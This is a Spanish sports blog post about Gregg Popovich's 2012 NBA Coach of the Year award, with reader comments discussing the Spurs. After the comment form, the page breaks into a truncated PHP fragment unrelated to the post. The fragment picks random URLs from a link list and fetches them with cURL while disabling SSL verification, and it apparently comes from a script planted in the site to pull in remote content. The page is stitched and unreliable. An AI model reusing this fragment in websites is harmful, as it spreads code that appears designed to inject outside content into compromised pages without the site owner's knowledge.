Gregg Popovich, entrenador del año

02 de May de 2012 por txusma

Por 2ª vez en su carrera el entrenador de los San Antonio Spurs se alza con el premio Red Auerbach al mejor entrenador del año. Los Spurs han acabado la liga regular empatados en el primer puesto con los Bulls, con un balance de 50 victorias y 16 derrotas (76% de victorias). Además, sorprendentemente la franquicia de San Antonio ha sido la 2ª máxima anotadora de la liga con 103.7 ppg, algo que hace unos años nos habría resultado inimaginable. Sin embargo, ha sido en la 2ª parte de la temporada cuando la franquicia de San Antonio se ha mostrado mucho más dominante al conseguir un 81% de victorias en los 32 partidos disputados y nada más y nada menos que 108 puntos por partido.

La carrera de Popovich en los Spurs es una carrera de éxito. Bajo su mandato los Spurs han encadenado 13 temporadas con 50 o más victorias, superando la marca de los Lakers que lo habían logrado entre 1980 y 1991. Su record de victorias es del 68% y ya lleva 847 con los Spurs, la 2ª mejor marca con un solo equipo tras las 1127 de Jerry Sloan.

Gregg Popovich ha superado en las votaciones al entrenador del otro equipo que ha acabado líder de la regular, Tom Thibodeau, ganador del año pasado. Seguramente, el factor sorpresa (pocos, muy pocos esperaban ver a los Spurs a este nivel) ha pesado en las votaciones. Frank Vogel, entrenador de los Pacers, que han acabado terceros del Este, se ha alzado con la tercera posición. Lionel Hollins y Doc Rivers han acabado cuarto y quinto respectivamente, lejos de los 3 primeros.

Comenta

9 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Olé por Popo!! se lo merece sí o sí. También Thibodeau, pero efecitvamente, el efecto sorpresa tiene que pesar. Saber administrar tres piezas de museo de reliquias solo está al alcance de tipos como Popovich o Rivers. Madre mía que semifinales en el oeste se nos avecinan. Spurs-Memphis y OKC-Lakers… puede pasar cualquier cosa. El este se va descafeinando cada día más, con lesiones y estas cosas. Miami se va a pegar un paseo terrible

      Citar

  2. TheDeerHunter dice:
    #2

    Nada que objetar. Merecidísimo. Lo más alucinante es su manera de reinventarse… y de sacar petróleo de todo lo que tiene.
    El tema de los Spurs cada día me recuerda más a lo de Mavs el año pasado. No terminamos de creerlo hasta que ocurre. Cuidadito que están fuertes.

      Citar

  3. MagicJohnson32 dice:
    #3

    Que conste que estoy completamente de acuerdo con el premio. Pero creo que hay otro hombre en los Spurs que merece tanto reconocimiento como le damos a Popovich: el General Manager, R. C. Buford. Es obvio que Popo gestiona de maravilla los recursos, que adapta perfectamente el juego para maximizar el potencial de los jugadores y que los Spurs este año son un prodigio de eficiencia ofensiva. Pero quien ha hecho posible esa plantilla tan profunda, quien saca petróleo del draft con elecciones bajas, quien hace los traspasos necesarios para ensamblar un equipo ganador es Buford, que me parece un auténtico crack en lo suyo.

      Citar

  4. Viva_Dirk dice:
    #4

    Totalmente merecido e igual de cierto lo que comenta Magic. Pero el gran trabajo de un GM no siempre genera un equipo ganador, el entrenador tiene que saber hacer funcionar una gran plantilla y eso Popovich lo hace perfecto. Stephen Jackson en otros sitios va a su bola, Diaw estaba gordo, ningun equipo NBA queria a Neal, Bonner jugaria 0 con muchísimos entrenadores, Danny Green jugó 100 minutos en toda la temporada 09-10 en los Cavs y así una lista muy larga de jugadores ganados para su causa. Es un profesional impresionante.

    Y añado otra cosa, con el los Spurs parecen tener un modelo claro de jugador, comprometido, alejados de las camaras y acostumbrados a hacer cada cosa que toca, sea jugar 20 minutos y anotar, o centrarse en la defensa de alguien todo un partido. Creo que la idiosincrasia de la franquicia desde la llegada de Duncan ha sido esta, y se me parece mucho a la de los Celtics de Russell y cia.

      Citar

  5. rumbero dice:
    #5

    Viva_Dirk:
    Diaw estaba gordo

    Y lo sigue estando xD Me da que a estas alturas ni una santísima trinidad al estilo Popovich-Jackson-Auerbach podría poner freno a ese sobrepeso.
    Coñas aparte, 100% de acuerdo con todo lo dicho. Yo también me quedo sobretodo con esa capacidad para reinventar un equipo que hace un par de temporadas parecía que ya había llegado a su límite. Bravo por él y ojito con estos Spurs que van a dar mucha guerra.

      Citar

  6. Ru dice:
    #6

    Firmo palabra por palabra lo dicho por Deer.

      Citar

  7. Lucho dice:
    #7

    Extraoficialmente Tyson Chandler gano el premio al jugador defensivo del año. Lo anuncian en unas horas

      Citar

  8. Melo15 dice:
    #8

    Tyson Chandler ha sido galardonado con el KIA National Player of the year

      Citar

  9. GreenPride dice:
    #9

    Merecidísimo premio para uno de los para mí 2 mejores entrenadores de la liga (el otro para mí Doc Rivers) Cada año saca petróleo de jugadores que nadie conoce y que otros no pondrían a jugar y sabe mantener a su equipo luchando por todo, administrando los minutos de su Big Three y haciendo jugar a todos.
    Creo que este año también lo merecía Thibodeau ya que gestionar un equipo sin tu gran estrella para que tenga el mejor record tiene mucho mérito pero que se lo den a Pop no me parece nada mal.
    Una anécdota de Pop, en el segundo partido y con los Spurs ganando fácil durante el tercer cuarto llama a Parker y le dice que le va a sentar ya para no volver. Parker le dice “estoy bien” y Pop le dice si juegas el cuarto entero habrás jugado 29 minutos a lo que Parker responde: “Tengo 27 años y estoy en buena forma. No te preocupes, puedo seguir sin problemas” ¿Y que pasó? Pues que Pop le dejó jugar casi hasta final de cuarto y no le sacó en el último, más o menos lo que quería Parker. Es decir, un sargente de hierro que también escucha a sus jugadores.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>